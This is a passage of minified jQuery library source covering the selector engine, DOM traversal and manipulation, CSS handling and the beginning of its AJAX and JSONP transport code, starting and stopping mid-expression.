RegExp(l.match[o].source+/(?![^\[]*\])(?![^\(]*\))/.source),l.leftMatch[o]=new RegExp(/(^(?:.|\r|\n)*?)/.source+l.match[o].source.replace(/\\(\d+)/g,n));var p=function(a,b){a=Array.prototype.slice.call(a,0);if(b){b.push.apply(b,a);return b}return a};try{Array.prototype.slice.call(c.documentElement.childNodes,0)[0].nodeType}catch(q){p=function(a,b){var c=0,d=b||[];if(e.call(a)==="[object Array]")Array.prototype.push.apply(d,a);else if(typeof a.length=="number")for(var f=a.length;c<f;c++)d.push(a[c]);else for(;a[c];c++)d.push(a[c]);return d}}var r,s;c.documentElement.compareDocumentPosition?r=function(a,b){if(a===b){g=!0;return 0}if(!a.compareDocumentPosition||!b.compareDocumentPosition)return a.compareDocumentPosition?-1:1;return a.compareDocumentPosition(b)&4?-1:1}:(r=function(a,b){if(a===b){g=!0;return 0}if(a.sourceIndex&&b.sourceIndex)return a.sourceIndex-b.sourceIndex;var c,d,e=[],f=[],h=a.parentNode,i=b.parentNode,j=h;if(h===i)return s(a,b);if(!h)return-1;if(!i)return 1;while(j)e.unshift(j),j=j.parentNode;j=i;while(j)f.unshift(j),j=j.parentNode;c=e.length,d=f.length;for(var k=0;k<c&&k<d;k++)if(e[k]!==f[k])return s(e[k],f[k]);return k===c?s(a,f[k],-1):s(e[k],b,1)},s=function(a,b,c){if(a===b)return c;var d=a.nextSibling;while(d){if(d===b)return-1;d=d.nextSibling}return 1}),k.getText=function(a){var b="",c;for(var d=0;a[d];d++)c=a[d],c.nodeType===3||c.nodeType===4?b+=c.nodeValue:c.nodeType!==8&&(b+=k.getText(c.childNodes));return b},function(){var a=c.createElement("div"),d="script"+(new Date).getTime(),e=c.documentElement;a.innerHTML="<a name='"+d+"'/>",e.insertBefore(a,e.firstChild),c.getElementById(d)&&(l.find.ID=function(a,c,d){if(typeof c.getElementById!="undefined"&&!d){var e=c.getElementById(a[1]);return e?e.id===a[1]||typeof e.getAttributeNode!="undefined"&&e.getAttributeNode("id").nodeValue===a[1]?[e]:b:[]}},l.filter.ID=function(a,b){var c=typeof a.getAttributeNode!="undefined"&&a.getAttributeNode("id");return a.nodeType===1&&c&&c.nodeValue===b}),e.removeChild(a),e=a=null}(),function(){var a=c.createElement("div");a.appendChild(c.createComment("")),a.getElementsByTagName("*").length>0&&(l.find.TAG=function(a,b){var c=b.getElementsByTagName(a[1]);if(a[1]==="*"){var d=[];for(var e=0;c[e];e++)c[e].nodeType===1&&d.push(c[e]);c=d}return c}),a.innerHTML="<a href='#'></a>",a.firstChild&&typeof a.firstChild.getAttribute!="undefined"&&a.firstChild.getAttribute("href")!=="#"&&(l.attrHandle.href=function(a){return a.getAttribute("href",2)}),a=null}(),c.querySelectorAll&&function(){var a=k,b=c.createElement("div"),d="__sizzle__";b.innerHTML="<p class='TEST'></p>";if(!b.querySelectorAll||b.querySelectorAll(".TEST").length!==0){k=function(b,e,f,g){e=e||c;if(!g&&!k.isXML(e)){var h=/^(\w+$)|^\.([\w\-]+$)|^#([\w\-]+$)/.exec(b);if(h&&(e.nodeType===1||e.nodeType===9)){if(h[1])return p(e.getElementsByTagName(b),f);if(h[2]&&l.find.CLASS&&e.getElementsByClassName)return p(e.getElementsByClassName(h[2]),f)}if(e.nodeType===9){if(b==="body"&&e.body)return p([e.body],f);if(h&&h[3]){var i=e.getElementById(h[3]);if(!i||!i.parentNode)return p([],f);if(i.id===h[3])return p([i],f)}try{return p(e.querySelectorAll(b),f)}catch(j){}}else if(e.nodeType===1&&e.nodeName.toLowerCase()!=="object"){var m=e,n=e.getAttribute("id"),o=n||d,q=e.parentNode,r=/^\s*[+~]/.test(b);n?o=o.replace(/'/g,"\\$&"):e.setAttribute("id",o),r&&q&&(e=e.parentNode);try{if(!r||q)return p(e.querySelectorAll("[id='"+o+"'] "+b),f)}catch(s){}finally{n||m.removeAttribute("id")}}}return a(b,e,f,g)};for(var e in a)k[e]=a[e];b=null}}(),function(){var a=c.documentElement,b=a.matchesSelector||a.mozMatchesSelector||a.webkitMatchesSelector||a.msMatchesSelector;if(b){var d=!b.call(c.createElement("div"),"div"),e=!1;try{b.call(c.documentElement,"[test!='']:sizzle")}catch(f){e=!0}k.matchesSelector=function(a,c){c=c.replace(/\=\s*([^'"\]]*)\s*\]/g,"='$1']");if(!k.isXML(a))try{if(e||!l.match.PSEUDO.test(c)&&!/!=/.test(c)){var f=b.call(a,c);if(f||!d||a.document&&a.document.nodeType!==11)return f}}catch(g){}return k(c,null,null,[a]).length>0}}}(),function(){var a=c.createElement("div");a.innerHTML="<div class='test e'></div><div class='test'></div>";if(!!a.getElementsByClassName&&a.getElementsByClassName("e").length!==0){a.lastChild.className="e";if(a.getElementsByClassName("e").length===1)return;l.order.splice(1,0,"CLASS"),l.find.CLASS=function(a,b,c){if(typeof b.getElementsByClassName!="undefined"&&!c)return b.getElementsByClassName(a[1])},a=null}}(),c.documentElement.contains?k.contains=function(a,b){return a!==b&&(a.contains?a.contains(b):!0)}:c.documentElement.compareDocumentPosition?k.contains=function(a,b){return!!(a.compareDocumentPosition(b)&16)}:k.contains=function(){return!1},k.isXML=function(a){var b=(a?a.ownerDocument||a:0).documentElement;return b?b.nodeName!=="HTML":!1};var v=function(a,b){var c,d=[],e="",f=b.nodeType?[b]:b;while(c=l.match.PSEUDO.exec(a))e+=c[0],a=a.replace(l.match.PSEUDO,"");a=l.relative[a]?a+"*":a;for(var g=0,h=f.length;g<h;g++)k(a,f[g],d);return k.filter(e,d)};f.find=k,f.expr=k.selectors,f.expr[":"]=f.expr.filters,f.unique=k.uniqueSort,f.text=k.getText,f.isXMLDoc=k.isXML,f.contains=k.contains}();var O=/Until$/,P=/^(?:parents|prevUntil|prevAll)/,Q=/,/,R=/^.[^:#\[\.,]*$/,S=Array.prototype.slice,T=f.expr.match.POS,U={children:!0,contents:!0,next:!0,prev:!0};f.fn.extend({find:function(a){var b=this,c,d;if(typeof a!="string")return f(a).filter(function(){for(c=0,d=b.length;c<d;c++)if(f.contains(b[c],this))return!0});var e=this.pushStack("","find",a),g,h,i;for(c=0,d=this.length;c<d;c++){g=e.length,f.find(a,this[c],e);if(c>0)for(h=g;h<e.length;h++)for(i=0;i<g;i++)if(e[i]===e[h]){e.splice(h--,1);break}}return e},has:function(a){var b=f(a);return this.filter(function(){for(var a=0,c=b.length;a<c;a++)if(f.contains(this,b[a]))return!0})},not:function(a){return this.pushStack(W(this,a,!1),"not",a)},filter:function(a){return this.pushStack(W(this,a,!0),"filter",a)},is:function(a){return!!a&&(typeof a=="string"?f.filter(a,this).length>0:this.filter(a).length>0)},closest:function(a,b){var c=[],d,e,g=this[0];if(f.isArray(a)){var h,i,j={},k=1;if(g&&a.length){for(d=0,e=a.length;d<e;d++)i=a[d],j[i]||(j[i]=T.test(i)?f(i,b||this.context):i);while(g&&g.ownerDocument&&g!==b){for(i in j)h=j[i],(h.jquery?h.index(g)>-1:f(g).is(h))&&c.push({selector:i,elem:g,level:k});g=g.parentNode,k++}}return c}var l=T.test(a)||typeof a!="string"?f(a,b||this.context):0;for(d=0,e=this.length;d<e;d++){g=this[d];while(g){if(l?l.index(g)>-1:f.find.matchesSelector(g,a)){c.push(g);break}g=g.parentNode;if(!g||!g.ownerDocument||g===b||g.nodeType===11)break}}c=c.length>1?f.unique(c):c;return this.pushStack(c,"closest",a)},index:function(a){if(!a||typeof a=="string")return f.inArray(this[0],a?f(a):this.parent().children());return f.inArray(a.jquery?a[0]:a,this)},add:function(a,b){var c=typeof a=="string"?f(a,b):f.makeArray(a&&a.nodeType?[a]:a),d=f.merge(this.get(),c);return this.pushStack(V(c[0])||V(d[0])?d:f.unique(d))},andSelf:function(){return this.add(this.prevObject)}}),f.each({parent:function(a){var b=a.parentNode;return b&&b.nodeType!==11?b:null},parents:function(a){return f.dir(a,"parentNode")},parentsUntil:function(a,b,c){return f.dir(a,"parentNode",c)},next:function(a){return f.nth(a,2,"nextSibling")},prev:function(a){return f.nth(a,2,"previousSibling")},nextAll:function(a){return f.dir(a,"nextSibling")},prevAll:function(a){return f.dir(a,"previousSibling")},nextUntil:function(a,b,c){return f.dir(a,"nextSibling",c)},prevUntil:function(a,b,c){return f.dir(a,"previousSibling",c)},siblings:function(a){return f.sibling(a.parentNode.firstChild,a)},children:function(a){return f.sibling(a.firstChild)},contents:function(a){return f.nodeName(a,"iframe")?a.contentDocument||a.contentWindow.document:f.makeArray(a.childNodes)}},function(a,b){f.fn[a]=function(c,d){var e=f.map(this,b,c),g=S.call(arguments);O.test(a)||(d=c),d&&typeof d=="string"&&(e=f.filter(d,e)),e=this.length>1&&!U[a]?f.unique(e):e,(this.length>1||Q.test(d))&&P.test(a)&&(e=e.reverse());return this.pushStack(e,a,g.join(","))}}),f.extend({filter:function(a,b,c){c&&(a=":not("+a+")");return b.length===1?f.find.matchesSelector(b[0],a)?[b[0]]:[]:f.find.matches(a,b)},dir:function(a,c,d){var e=[],g=a[c];while(g&&g.nodeType!==9&&(d===b||g.nodeType!==1||!f(g).is(d)))g.nodeType===1&&e.push(g),g=g[c];return e},nth:function(a,b,c,d){b=b||1;var e=0;for(;a;a=a[c])if(a.nodeType===1&&++e===b)break;return a},sibling:function(a,b){var c=[];for(;a;a=a.nextSibling)a.nodeType===1&&a!==b&&c.push(a);return c}});var X=/ jQuery\d+="(?:\d+|null)"/g,Y=/^\s+/,Z=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/ig,$=/<([\w:]+)/,_=/<tbody/i,ba=/<|&#?\w+;/,bb=/<(?:script|object|embed|option|style)/i,bc=/checked\s*(?:[^=]|=\s*.checked.)/i,bd=/\/(java|ecma)script/i,be=/^\s*<!(?:\[CDATA\[|\-\-)/,bf={option:[1,"<select multiple='multiple'>","</select>"],legend:[1,"<fieldset>","</fieldset>"],thead:[1,"<table>","</table>"],tr:[2,"<table><tbody>","</tbody></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],col:[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"],area:[1,"<map>","</map>"],_default:[0,"",""]};bf.optgroup=bf.option,bf.tbody=bf.tfoot=bf.colgroup=bf.caption=bf.thead,bf.th=bf.td,f.support.htmlSerialize||(bf._default=[1,"div<div>","</div>"]),f.fn.extend({text:function(a){if(f.isFunction(a))return this.each(function(b){var c=f(this);c.text(a.call(this,b,c.text()))});if(typeof a!="object"&&a!==b)return this.empty().append((this[0]&&this[0].ownerDocument||c).createTextNode(a));return f.text(this)},wrapAll:function(a){if(f.isFunction(a))return this.each(function(b){f(this).wrapAll(a.call(this,b))});if(this[0]){var b=f(a,this[0].ownerDocument).eq(0).clone(!0);this[0].parentNode&&b.insertBefore(this[0]),b.map(function(){var a=this;while(a.firstChild&&a.firstChild.nodeType===1)a=a.firstChild;return a}).append(this)}return this},wrapInner:function(a){if(f.isFunction(a))return this.each(function(b){f(this).wrapInner(a.call(this,b))});return this.each(function(){var b=f(this),c=b.contents();c.length?c.wrapAll(a):b.append(a)})},wrap:function(a){return this.each(function(){f(this).wrapAll(a)})},unwrap:function(){return this.parent().each(function(){f.nodeName(this,"body")||f(this).replaceWith(this.childNodes)}).end()},append:function(){return this.domManip(arguments,!0,function(a){this.nodeType===1&&this.appendChild(a)})},prepend:function(){return this.domManip(arguments,!0,function(a){this.nodeType===1&&this.insertBefore(a,this.firstChild)})},before:function(){if(this[0]&&this[0].parentNode)return this.domManip(arguments,!1,function(a){this.parentNode.insertBefore(a,this)});if(arguments.length){var a=f(arguments[0]);a.push.apply(a,this.toArray());return this.pushStack(a,"before",arguments)}},after:function(){if(this[0]&&this[0].parentNode)return this.domManip(arguments,!1,function(a){this.parentNode.insertBefore(a,this.nextSibling)});if(arguments.length){var a=this.pushStack(this,"after",arguments);a.push.apply(a,f(arguments[0]).toArray());return a}},remove:function(a,b){for(var c=0,d;(d=this[c])!=null;c++)if(!a||f.filter(a,[d]).length)!b&&d.nodeType===1&&(f.cleanData(d.getElementsByTagName("*")),f.cleanData([d])),d.parentNode&&d.parentNode.removeChild(d);return this},empty:function(){for(var a=0,b;(b=this[a])!=null;a++){b.nodeType===1&&f.cleanData(b.getElementsByTagName("*"));while(b.firstChild)b.removeChild(b.firstChild)}return this},clone:function(a,b){a=a==null?!1:a,b=b==null?a:b;return this.map(function(){return f.clone(this,a,b)})},html:function(a){if(a===b)return this[0]&&this[0].nodeType===1?this[0].innerHTML.replace(X,""):null;if(typeof a=="string"&&!bb.test(a)&&(f.support.leadingWhitespace||!Y.test(a))&&!bf[($.exec(a)||["",""])[1].toLowerCase()]){a=a.replace(Z,"<$1></$2>");try{for(var c=0,d=this.length;c<d;c++)this[c].nodeType===1&&(f.cleanData(this[c].getElementsByTagName("*")),this[c].innerHTML=a)}catch(e){this.empty().append(a)}}else f.isFunction(a)?this.each(function(b){var c=f(this);c.html(a.call(this,b,c.html()))}):this.empty().append(a);return this},replaceWith:function(a){if(this[0]&&this[0].parentNode){if(f.isFunction(a))return this.each(function(b){var c=f(this),d=c.html();c.replaceWith(a.call(this,b,d))});typeof a!="string"&&(a=f(a).detach());return this.each(function(){var b=this.nextSibling,c=this.parentNode;f(this).remove(),b?f(b).before(a):f(c).append(a)})}return this.length?this.pushStack(f(f.isFunction(a)?a():a),"replaceWith",a):this},detach:function(a){return this.remove(a,!0)},domManip:function(a,c,d){var e,g,h,i,j=a[0],k=[];if(!f.support.checkClone&&arguments.length===3&&typeof j=="string"&&bc.test(j))return this.each(function(){f(this).domManip(a,c,d,!0)});if(f.isFunction(j))return this.each(function(e){var g=f(this);a[0]=j.call(this,e,c?g.html():b),g.domManip(a,c,d)});if(this[0]){i=j&&j.parentNode,f.support.parentNode&&i&&i.nodeType===11&&i.childNodes.length===this.length?e={fragment:i}:e=f.buildFragment(a,this,k),h=e.fragment,h.childNodes.length===1?g=h=h.firstChild:g=h.firstChild;if(g){c=c&&f.nodeName(g,"tr");for(var l=0,m=this.length,n=m-1;l<m;l++)d.call(c?bg(this[l],g):this[l],e.cacheable||m>1&&l<n?f.clone(h,!0,!0):h)}k.length&&f.each(k,bm)}return this}}),f.buildFragment=function(a,b,d){var e,g,h,i;b&&b[0]&&(i=b[0].ownerDocument||b[0]),i.createDocumentFragment||(i=c),a.length===1&&typeof a[0]=="string"&&a[0].length<512&&i===c&&a[0].charAt(0)==="<"&&!bb.test(a[0])&&(f.support.checkClone||!bc.test(a[0]))&&(g=!0,h=f.fragments[a[0]],h&&h!==1&&(e=h)),e||(e=i.createDocumentFragment(),f.clean(a,i,e,d)),g&&(f.fragments[a[0]]=h?e:1);return{fragment:e,cacheable:g}},f.fragments={},f.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(a,b){f.fn[a]=function(c){var d=[],e=f(c),g=this.length===1&&this[0].parentNode;if(g&&g.nodeType===11&&g.childNodes.length===1&&e.length===1){e[b](this[0]);return this}for(var h=0,i=e.length;h<i;h++){var j=(h>0?this.clone(!0):this).get();f(e[h])[b](j),d=d.concat(j +)}return this.pushStack(d,a,e.selector)}}),f.extend({clone:function(a,b,c){var d=a.cloneNode(!0),e,g,h;if((!f.support.noCloneEvent||!f.support.noCloneChecked)&&(a.nodeType===1||a.nodeType===11)&&!f.isXMLDoc(a)){bi(a,d),e=bj(a),g=bj(d);for(h=0;e[h];++h)bi(e[h],g[h])}if(b){bh(a,d);if(c){e=bj(a),g=bj(d);for(h=0;e[h];++h)bh(e[h],g[h])}}e=g=null;return d},clean:function(a,b,d,e){var g;b=b||c,typeof b.createElement=="undefined"&&(b=b.ownerDocument||b[0]&&b[0].ownerDocument||c);var h=[],i;for(var j=0,k;(k=a[j])!=null;j++){typeof k=="number"&&(k+="");if(!k)continue;if(typeof k=="string")if(!ba.test(k))k=b.createTextNode(k);else{k=k.replace(Z,"<$1></$2>");var l=($.exec(k)||["",""])[1].toLowerCase(),m=bf[l]||bf._default,n=m[0],o=b.createElement("div");o.innerHTML=m[1]+k+m[2];while(n--)o=o.lastChild;if(!f.support.tbody){var p=_.test(k),q=l==="table"&&!p?o.firstChild&&o.firstChild.childNodes:m[1]==="<table>"&&!p?o.childNodes:[];for(i=q.length-1;i>=0;--i)f.nodeName(q[i],"tbody")&&!q[i].childNodes.length&&q[i].parentNode.removeChild(q[i])}!f.support.leadingWhitespace&&Y.test(k)&&o.insertBefore(b.createTextNode(Y.exec(k)[0]),o.firstChild),k=o.childNodes}var r;if(!f.support.appendChecked)if(k[0]&&typeof (r=k.length)=="number")for(i=0;i<r;i++)bl(k[i]);else bl(k);k.nodeType?h.push(k):h=f.merge(h,k)}if(d){g=function(a){return!a.type||bd.test(a.type)};for(j=0;h[j];j++)if(e&&f.nodeName(h[j],"script")&&(!h[j].type||h[j].type.toLowerCase()==="text/javascript"))e.push(h[j].parentNode?h[j].parentNode.removeChild(h[j]):h[j]);else{if(h[j].nodeType===1){var s=f.grep(h[j].getElementsByTagName("script"),g);h.splice.apply(h,[j+1,0].concat(s))}d.appendChild(h[j])}}return h},cleanData:function(a){var b,c,d=f.cache,e=f.expando,g=f.event.special,h=f.support.deleteExpando;for(var i=0,j;(j=a[i])!=null;i++){if(j.nodeName&&f.noData[j.nodeName.toLowerCase()])continue;c=j[f.expando];if(c){b=d[c]&&d[c][e];if(b&&b.events){for(var k in b.events)g[k]?f.event.remove(j,k):f.removeEvent(j,k,b.handle);b.handle&&(b.handle.elem=null)}h?delete j[f.expando]:j.removeAttribute&&j.removeAttribute(f.expando),delete d[c]}}}});var bn=/alpha\([^)]*\)/i,bo=/opacity=([^)]*)/,bp=/([A-Z]|^ms)/g,bq=/^-?\d+(?:px)?$/i,br=/^-?\d/,bs=/^[+\-]=/,bt=/[^+\-\.\de]+/g,bu={position:"absolute",visibility:"hidden",display:"block"},bv=["Left","Right"],bw=["Top","Bottom"],bx,by,bz;f.fn.css=function(a,c){if(arguments.length===2&&c===b)return this;return f.access(this,a,c,!0,function(a,c,d){return d!==b?f.style(a,c,d):f.css(a,c)})},f.extend({cssHooks:{opacity:{get:function(a,b){if(b){var c=bx(a,"opacity","opacity");return c===""?"1":c}return a.style.opacity}}},cssNumber:{fillOpacity:!0,fontWeight:!0,lineHeight:!0,opacity:!0,orphans:!0,widows:!0,zIndex:!0,zoom:!0},cssProps:{"float":f.support.cssFloat?"cssFloat":"styleFloat"},style:function(a,c,d,e){if(!!a&&a.nodeType!==3&&a.nodeType!==8&&!!a.style){var g,h,i=f.camelCase(c),j=a.style,k=f.cssHooks[i];c=f.cssProps[i]||i;if(d===b){if(k&&"get"in k&&(g=k.get(a,!1,e))!==b)return g;return j[c]}h=typeof d;if(h==="number"&&isNaN(d)||d==null)return;h==="string"&&bs.test(d)&&(d=+d.replace(bt,"")+parseFloat(f.css(a,c)),h="number"),h==="number"&&!f.cssNumber[i]&&(d+="px");if(!k||!("set"in k)||(d=k.set(a,d))!==b)try{j[c]=d}catch(l){}}},css:function(a,c,d){var e,g;c=f.camelCase(c),g=f.cssHooks[c],c=f.cssProps[c]||c,c==="cssFloat"&&(c="float");if(g&&"get"in g&&(e=g.get(a,!0,d))!==b)return e;if(bx)return bx(a,c)},swap:function(a,b,c){var d={};for(var e in b)d[e]=a.style[e],a.style[e]=b[e];c.call(a);for(e in b)a.style[e]=d[e]}}),f.curCSS=f.css,f.each(["height","width"],function(a,b){f.cssHooks[b]={get:function(a,c,d){var e;if(c){if(a.offsetWidth!==0)return bA(a,b,d);f.swap(a,bu,function(){e=bA(a,b,d)});return e}},set:function(a,b){if(!bq.test(b))return b;b=parseFloat(b);if(b>=0)return b+"px"}}}),f.support.opacity||(f.cssHooks.opacity={get:function(a,b){return bo.test((b&&a.currentStyle?a.currentStyle.filter:a.style.filter)||"")?parseFloat(RegExp.$1)/100+"":b?"1":""},set:function(a,b){var c=a.style,d=a.currentStyle;c.zoom=1;var e=f.isNaN(b)?"":"alpha(opacity="+b*100+")",g=d&&d.filter||c.filter||"";c.filter=bn.test(g)?g.replace(bn,e):g+" "+e}}),f(function(){f.support.reliableMarginRight||(f.cssHooks.marginRight={get:function(a,b){var c;f.swap(a,{display:"inline-block"},function(){b?c=bx(a,"margin-right","marginRight"):c=a.style.marginRight});return c}})}),c.defaultView&&c.defaultView.getComputedStyle&&(by=function(a,c){var d,e,g;c=c.replace(bp,"-$1").toLowerCase();if(!(e=a.ownerDocument.defaultView))return b;if(g=e.getComputedStyle(a,null))d=g.getPropertyValue(c),d===""&&!f.contains(a.ownerDocument.documentElement,a)&&(d=f.style(a,c));return d}),c.documentElement.currentStyle&&(bz=function(a,b){var c,d=a.currentStyle&&a.currentStyle[b],e=a.runtimeStyle&&a.runtimeStyle[b],f=a.style;!bq.test(d)&&br.test(d)&&(c=f.left,e&&(a.runtimeStyle.left=a.currentStyle.left),f.left=b==="fontSize"?"1em":d||0,d=f.pixelLeft+"px",f.left=c,e&&(a.runtimeStyle.left=e));return d===""?"auto":d}),bx=by||bz,f.expr&&f.expr.filters&&(f.expr.filters.hidden=function(a){var b=a.offsetWidth,c=a.offsetHeight;return b===0&&c===0||!f.support.reliableHiddenOffsets&&(a.style.display||f.css(a,"display"))==="none"},f.expr.filters.visible=function(a){return!f.expr.filters.hidden(a)});var bB=/%20/g,bC=/\[\]$/,bD=/\r?\n/g,bE=/#.*$/,bF=/^(.*?):[ \t]*([^\r\n]*)\r?$/mg,bG=/^(?:color|date|datetime|email|hidden|month|number|password|range|search|tel|text|time|url|week)$/i,bH=/^(?:about|app|app\-storage|.+\-extension|file|widget):$/,bI=/^(?:GET|HEAD)$/,bJ=/^\/\//,bK=/\?/,bL=/<script\b[^<]*(?:(?!<\/script>)<[^<]*)*<\/script>/gi,bM=/^(?:select|textarea)/i,bN=/\s+/,bO=/([?&])_=[^&]*/,bP=/^([\w\+\.\-]+:)(?:\/\/([^\/?#:]*)(?::(\d+))?)?/,bQ=f.fn.load,bR={},bS={},bT,bU;try{bT=e.href}catch(bV){bT=c.createElement("a"),bT.href="",bT=bT.href}bU=bP.exec(bT.toLowerCase())||[],f.fn.extend({load:function(a,c,d){if(typeof a!="string"&&bQ)return bQ.apply(this,arguments);if(!this.length)return this;var e=a.indexOf(" ");if(e>=0){var g=a.slice(e,a.length);a=a.slice(0,e)}var h="GET";c&&(f.isFunction(c)?(d=c,c=b):typeof c=="object"&&(c=f.param(c,f.ajaxSettings.traditional),h="POST"));var i=this;f.ajax({url:a,type:h,dataType:"html",data:c,complete:function(a,b,c){c=a.responseText,a.isResolved()&&(a.done(function(a){c=a}),i.html(g?f("<div>").append(c.replace(bL,"")).find(g):c)),d&&i.each(d,[c,b,a])}});return this},serialize:function(){return f.param(this.serializeArray())},serializeArray:function(){return this.map(function(){return this.elements?f.makeArray(this.elements):this}).filter(function(){return this.name&&!this.disabled&&(this.checked||bM.test(this.nodeName)||bG.test(this.type))}).map(function(a,b){var c=f(this).val();return c==null?null:f.isArray(c)?f.map(c,function(a,c){return{name:b.name,value:a.replace(bD,"\r\n")}}):{name:b.name,value:c.replace(bD,"\r\n")}}).get()}}),f.each("ajaxStart ajaxStop ajaxComplete ajaxError ajaxSuccess ajaxSend".split(" "),function(a,b){f.fn[b]=function(a){return this.bind(b,a)}}),f.each(["get","post"],function(a,c){f[c]=function(a,d,e,g){f.isFunction(d)&&(g=g||e,e=d,d=b);return f.ajax({type:c,url:a,data:d,success:e,dataType:g})}}),f.extend({getScript:function(a,c){return f.get(a,b,c,"script")},getJSON:function(a,b,c){return f.get(a,b,c,"json")},ajaxSetup:function(a,b){b?f.extend(!0,a,f.ajaxSettings,b):(b=a,a=f.extend(!0,f.ajaxSettings,b));for(var c in{context:1,url:1})c in b?a[c]=b[c]:c in f.ajaxSettings&&(a[c]=f.ajaxSettings[c]);return a},ajaxSettings:{url:bT,isLocal:bH.test(bU[1]),global:!0,type:"GET",contentType:"application/x-www-form-urlencoded",processData:!0,async:!0,accepts:{xml:"application/xml, text/xml",html:"text/html",text:"text/plain",json:"application/json, text/javascript","*":"*/*"},contents:{xml:/xml/,html:/html/,json:/json/},responseFields:{xml:"responseXML",text:"responseText"},converters:{"* text":a.String,"text html":!0,"text json":f.parseJSON,"text xml":f.parseXML}},ajaxPrefilter:bW(bR),ajaxTransport:bW(bS),ajax:function(a,c){function w(a,c,l,m){if(s!==2){s=2,q&&clearTimeout(q),p=b,n=m||"",v.readyState=a?4:0;var o,r,u,w=l?bZ(d,v,l):b,x,y;if(a>=200&&a<300||a===304){if(d.ifModified){if(x=v.getResponseHeader("Last-Modified"))f.lastModified[k]=x;if(y=v.getResponseHeader("Etag"))f.etag[k]=y}if(a===304)c="notmodified",o=!0;else try{r=b$(d,w),c="success",o=!0}catch(z){c="parsererror",u=z}}else{u=c;if(!c||a)c="error",a<0&&(a=0)}v.status=a,v.statusText=c,o?h.resolveWith(e,[r,c,v]):h.rejectWith(e,[v,c,u]),v.statusCode(j),j=b,t&&g.trigger("ajax"+(o?"Success":"Error"),[v,d,o?r:u]),i.resolveWith(e,[v,c]),t&&(g.trigger("ajaxComplete",[v,d]),--f.active||f.event.trigger("ajaxStop"))}}typeof a=="object"&&(c=a,a=b),c=c||{};var d=f.ajaxSetup({},c),e=d.context||d,g=e!==d&&(e.nodeType||e instanceof f)?f(e):f.event,h=f.Deferred(),i=f._Deferred(),j=d.statusCode||{},k,l={},m={},n,o,p,q,r,s=0,t,u,v={readyState:0,setRequestHeader:function(a,b){if(!s){var c=a.toLowerCase();a=m[c]=m[c]||a,l[a]=b}return this},getAllResponseHeaders:function(){return s===2?n:null},getResponseHeader:function(a){var c;if(s===2){if(!o){o={};while(c=bF.exec(n))o[c[1].toLowerCase()]=c[2]}c=o[a.toLowerCase()]}return c===b?null:c},overrideMimeType:function(a){s||(d.mimeType=a);return this},abort:function(a){a=a||"abort",p&&p.abort(a),w(0,a);return this}};h.promise(v),v.success=v.done,v.error=v.fail,v.complete=i.done,v.statusCode=function(a){if(a){var b;if(s<2)for(b in a)j[b]=[j[b],a[b]];else b=a[v.status],v.then(b,b)}return this},d.url=((a||d.url)+"").replace(bE,"").replace(bJ,bU[1]+"//"),d.dataTypes=f.trim(d.dataType||"*").toLowerCase().split(bN),d.crossDomain==null&&(r=bP.exec(d.url.toLowerCase()),d.crossDomain=!(!r||r[1]==bU[1]&&r[2]==bU[2]&&(r[3]||(r[1]==="http:"?80:443))==(bU[3]||(bU[1]==="http:"?80:443)))),d.data&&d.processData&&typeof d.data!="string"&&(d.data=f.param(d.data,d.traditional)),bX(bR,d,c,v);if(s===2)return!1;t=d.global,d.type=d.type.toUpperCase(),d.hasContent=!bI.test(d.type),t&&f.active++===0&&f.event.trigger("ajaxStart");if(!d.hasContent){d.data&&(d.url+=(bK.test(d.url)?"&":"?")+d.data),k=d.url;if(d.cache===!1){var x=f.now(),y=d.url.replace(bO,"$1_="+x);d.url=y+(y===d.url?(bK.test(d.url)?"&":"?")+"_="+x:"")}}(d.data&&d.hasContent&&d.contentType!==!1||c.contentType)&&v.setRequestHeader("Content-Type",d.contentType),d.ifModified&&(k=k||d.url,f.lastModified[k]&&v.setRequestHeader("If-Modified-Since",f.lastModified[k]),f.etag[k]&&v.setRequestHeader("If-None-Match",f.etag[k])),v.setRequestHeader("Accept",d.dataTypes[0]&&d.accepts[d.dataTypes[0]]?d.accepts[d.dataTypes[0]]+(d.dataTypes[0]!=="*"?", */*; q=0.01":""):d.accepts["*"]);for(u in d.headers)v.setRequestHeader(u,d.headers[u]);if(d.beforeSend&&(d.beforeSend.call(e,v,d)===!1||s===2)){v.abort();return!1}for(u in{success:1,error:1,complete:1})v[u](d[u]);p=bX(bS,d,c,v);if(!p)w(-1,"No Transport");else{v.readyState=1,t&&g.trigger("ajaxSend",[v,d]),d.async&&d.timeout>0&&(q=setTimeout(function(){v.abort("timeout")},d.timeout));try{s=1,p.send(l,w)}catch(z){status<2?w(-1,z):f.error(z)}}return v},param:function(a,c){var d=[],e=function(a,b){b=f.isFunction(b)?b():b,d[d.length]=encodeURIComponent(a)+"="+encodeURIComponent(b)};c===b&&(c=f.ajaxSettings.traditional);if(f.isArray(a)||a.jquery&&!f.isPlainObject(a))f.each(a,function(){e(this.name,this.value)});else for(var g in a)bY(g,a[g],c,e);return d.join("&").replace(bB,"+")}}),f.extend({active:0,lastModified:{},etag:{}});var b_=f.now(),ca=/(\=)\?(&|$)|\?\?/i;f.ajaxSetup({jsonp:"callback",jsonpCallback:function(){return f.expando+"_"+b_++}}),f.ajaxPrefilter("json jsonp",function(b,c,d){var e=b.contentType==="application/x-www-form-urlencoded"&&typeof b.data=="string";if(b.dataTypes[0]==="jsonp"||b.jsonp!==!1&&(ca.test(b.url)||e&&ca.test(b.data))){var g,h=b.jsonpCallback=f.isFunction(b.jsonpCallback)?b.jsonpCallback():b.jsonpCallback,i=a[h],j=b.url,k=b.data,l="$1"+h+"$2";b.jsonp!==!1&&(j=j.replace(ca,l),b.url===j&&(e&&(k=k.replace(ca,l)),b.data===k&&(j+=(/\?/.test(j)?"&":"?")+b.jsonp+"="+h))),b.url=j,b.data=k,a[h]=function(a){g=[a]},d.always(function(){a[h]=i,g&&f.isFunction(i)&&a[h](g[0])}),b.converters["script json"]=function(){g||f.error(h+" was not called");return g[0]},b.dataTypes[0]="json";return"script"}}),f.ajaxSetup({accepts:{script:"text/javascript, application/javascript, application/ecmascript, application/x-ecmascript"},contents:{script:/javascript|ecmascript/},converters:{"text script":function(a){f.globalEval(a);return a}}}),f.ajaxPrefilter("script",function(a){a.cache===b&&(a.cache=!1),a.crossDomain&&(a.type="GET",a.global=!1)}),f.ajaxTransport("script",function(a){if(a.crossDomain){var 